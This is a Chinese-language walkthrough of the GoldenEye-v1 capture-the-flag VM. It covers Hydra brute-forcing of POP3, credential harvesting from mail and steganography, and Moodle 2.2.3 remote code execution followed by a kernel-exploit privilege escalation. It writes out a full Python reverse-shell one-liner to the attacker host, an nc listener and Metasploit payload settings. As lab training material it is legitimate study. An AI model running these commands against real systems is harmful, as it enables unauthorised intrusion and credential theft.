渗透测试——GoldenEye-v1靶机渗透提权详细教程(Hydar爆破POP3,MSF框架反弹shell,内核exp提权) 休息了几天今天给大家带来一篇渗透测试的GoldenEye-v1靶机文章文章目录靶机简介信息收集Web服务目录探测失败Web服务源码探测POP3服务尝试登陆Hydra爆破POP3服务POP3服务信息收集普通用户登陆xenia内容系统版本Site blog: 2.2.3发现新用户Doak高级用户登陆Doak系统内部信息收集Misc图片隐写管理员用户登陆Admin漏洞利用Moodle 2.2.3漏洞一手动反弹shell漏洞二使用MSF框架网上WP修改exp源码内核提权总结靶机简介这里我们把下载好的文件导入到VirualBox并设置好相应的网段随后打开Kali开始我们的渗透提权操作Kali地址192.168.56.119目标网段192.168.56.0/24话不多说我们直接开始信息收集首先我们使用Nmap等工具找到靶机的具体IP地址随后再收集其开放了哪些端口以及服务# 得到具体地址nmap-sP192.168.56.0/24# 搜集端口以及服务nmap-sC-sV-A-T4-p-192.168.56.101过程经过测试确定目标地址为192.168.56.101开放的服务以及端口其他工具扫描出来的也一样结果分析25端口/ Postfix SMTPD负责接收并转发网络邮件请求是邮件系统的邮件传输代理服务。80端口/ Apache HTTPD提供Web网站访问服务运行Ubuntu系统环境是渗透测试中的核心Web入口。55006端口/ Dovecot POP3基于SSL加密的POP3邮件接收服务允许邮件客户端从服务器下载邮件。55007端口/ Dovecot POP3未加密的POP3邮件接收服务用于常规邮件获取可用于提取敏感账号信息。Web服务目录探测失败这里我们先访问 http://192.168.56.101/ 得到页面如下页面提示我们可以去到/sev-home/进行登陆访问后需要我们账号密码既然这条路行不通那我们先探测其是否存在可用的目录很遗憾http://192.168.56.101/并没有可用信息Web服务源码探测这里既然没有办法那我们就只能查看源代码以及控制台是否有可用信息了这里我们刷新查看页面没成想发现了一点信息在terminal.js 发现了遗留的信息// //Boris,makesure you update your default password. //My sources say MI6 maybe planning to infiltrate. //Be on the lookoutforany suspicious network traffic....// //I encoded you pssword below... // //#73;#110;#118;#105;#110;#99;#105;#98;#108;#101;#72;#97;#99;#107;#51;#114;// //BTW Natalya says she canbreakyour codes //将上述代码的内容进行Html实体编码结果如下得到密码InvincibleHack3r而用户名则有可能是Natalya和boris分别进行尝试经过尝试最终的账号密码为 boris / InvincibleHack3r登陆后的页面如下http://192.168.56.101/sev-home/随后我发现该网页的Cookie只是进行简单的base64编码并没有进行加密那是不是说明如果我们得到root用户权限的话就可以进行越权访问POP3服务尝试登陆这里我们复制页面的话得到下一个我们的目标应该是POP3邮件协议这里我们尝试进行Telnet登陆telnet192.168.56.10155007# 尝试登陆USERborisUSERNatalya PASS InvincibleHack3r但是都失败了说明我们可能还有信息未收集回头继续查看源代码重新回到 http://192.168.56.101/terminal.js 页面我们发现了“默认密码”的字眼并且很有可能就是pssword尝试一下失败了。。。Hydra爆破POP3服务既然如此也只能用最后的办法了这里我们将知道的两个用户名添加到user.txt 里echo-enatalya\nborisuser.txt# 开始爆破hydra-Luser.txt-P/usr/share/wordlists/fasttrack.txt192.168.56.101-s55007pop3为什么只尝试55007端口因为55007端口是未加密的而55006端口是由SSL进行加密过程成功得到结果natalya/bird再次尝试进行登陆- telnet192.168.56.10155007-USERnatalya - PASS bird成功进入POP3服务接下来进行对其进行信息收集了POP3服务信息收集随后输入# 查看邮箱里有多少封邮件LIST# 读取邮件RETR1RETR2这里得到两封邮件分别继续读取1第一封邮件内容2第二封邮件从第二封邮件中我们得到了一个系统的用户以及密码username:xeniapassword:RCP90rulez!并且还帮我们指示该如何操作必须把靶机 IP 绑定到域名 severnaya-station.com普通用户登陆xenia执行下面命令即可Windows步骤也一样# 终端输入,并添加nano/etc/hosts192.168.56.101 severnaya-station.com# 保存退出- CtrlO → 回车 - CtrlX# ------------------- Windows步骤 ------------------- # 管理员身份打开 CMDecho192.168.56.101 severnaya-station.comC:\Windows\System32\drivers\etc\hosts# 验证是否修改成功typeC:\Windows\System32\drivers\etc\hosts随后访问新登录地址http://severnaya-station.com/gnocertdir成进入新系统然后进行登陆进入系统后进行信息收集内容系统版本Site blog: 2.2.3得到版本发现新用户Doak在邮件记录里发现了一个用户发给我们的邮件高级用户登陆Doak既然有了一个新的用户名看起来权限更高那就继续尝试能不能进行爆破# 再次进行爆破echodoakuser.txt hydra-Luser.txt-P/usr/share/wordlists/fasttrack.txt192.168.56.101-s55007pop3得到结果doak/goat随后切换到doak用户查看邮件信息telnet192.168.56.10155007USERdoak PASS goat# 查看邮箱里有多少封邮件LIST# 读取邮件RETR1结果如下得到了新的用户名与密码username:dr_doakpassword:4England!随后切换用户进行登陆系统内部信息收集同理还是继续查找邮件信息我们得到了一个文件s3cret.txt隐藏路径//dir007key/for-007.jpg管理员凭证获取提示/ 管理员凭证通过明文捕获未在此处直接展示Misc图片隐写于是我们访问http://192.168.56.101/dir007key/for-007.jpg得到如下结果提示PICKED UP A LIFT ACCESS KEY.这里只有图片看来是Misc杂项的图片隐写好久没弄了我都忘了CTF还有这种题型哪天给大家复习一下这方面的知识插一句010 editor真的是杂项神器这里简单查看一下图片的属性果然发现了异常结果如下xWinter1995x!密码Admin用户的管理员用户登陆Admin尝试一下果然如此存在的用户列表并且在底部我们可以得到服务的名字Moodle Docsforthis pageMoodle Docsforthis page You are loggedinas Admin User(Logout)接下来的思路查看当前框架是否存在RCE漏洞看能不能越权拿到机器的root权限漏洞利用Moodle 2.2.3漏洞一手动反弹shell在目标机器的sever服务中此次存在漏洞能够执行python命令反弹shell随后找到editor模块触发命令# 反弹shell命令很多随便选一条就行python-cimport socket,subprocess,os;ssocket.socket( socket.AF_INET,socket.SOCK_STREAM);s.connect((192.168.56.119,6666));os.dup2( s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);psubprocess.call([/bin/sh,-i]);# kali监听nc-lvnp6666过程connect to[192.168.56.119]from(UNKNOWN)[192.168.56.101]49854$whoamiwww-data随后执行命令即可漏洞二使用MSF框架MSF就方便多了msfconsole-qsearch moodle use1# 填写参数setusername adminsetpassword xWinter1995x!setrhost severnaya-station.comsettargeturi /gnocertdir/ show options# 设置反弹payloadsetpayload cmd/unix/reversesetlhost192.168.56.119 run过程如下选择第一个框架设置payload填写参数没有成功网上WP修改exp源码然后通过上网查资料得知msf中这个exp源码拼写引擎为PSpellShell靶机系统界面默认是google spell要将靶机系统上修改为PSpellShell随后成功反弹shell到kali上[*]Reading from socket A[*]A:xV6LoNqjEryhmTLf\r\n[*]Matching...[*]B is input...[*]Command shell session1opened(192.168.56.119:4444 -192.168.56.101:47448)at2026-03-2718:11:03 0800iduid33(www-data)gid33(www-data)groups33(www-data)ifconfigeth0 Link encap:Ethernet HWaddr 00:0c:29:70:83:d7 inet addr:192.168.56.101 Bcast:192.168.56.255 Mask:255.255.255.0 inet6 addr: fe80::20c:29ff:fe70:83d7/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:72049 errors:0 dropped:0 overruns:0 frame:0 TX packets:71570 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:4457667(4.4MB)TX bytes:5886895(5.8MB)lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:11695 errors:0 dropped:0 overruns:0 frame:0 TX packets:11695 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:6406841(6.4MB)TX bytes:6406841(6.4MB)whoamiwww-data内核提权其实具体步骤与“脏牛提权”差不多这里就不赘述了漏洞库查找目标机器版本linux ubuntu 3.13.0-32-generic得到相应的ID37292# 使用kali自带的框架寻找searchsploit37292并且该脚本是支持gcc编译的随后上传到目标机器并编译最后成功提权到root用户总结Web 信息收集目录扫描、源码审计、隐藏参数/路径发现HTTP 认证绕过基础认证暴力破解、弱口令利用邮件服务利用POP3 协议交互、邮件内容提取敏感信息Linux 权限提升SUID 权限滥用、可写文件提权、环境变量注入服务枚举端口扫描nmap、服务版本识别、漏洞关联密码分析从配置文件/日志/邮件中提取密码、密码复用反弹 shell 与持久化获取交互式 shell、权限维持期待下次再见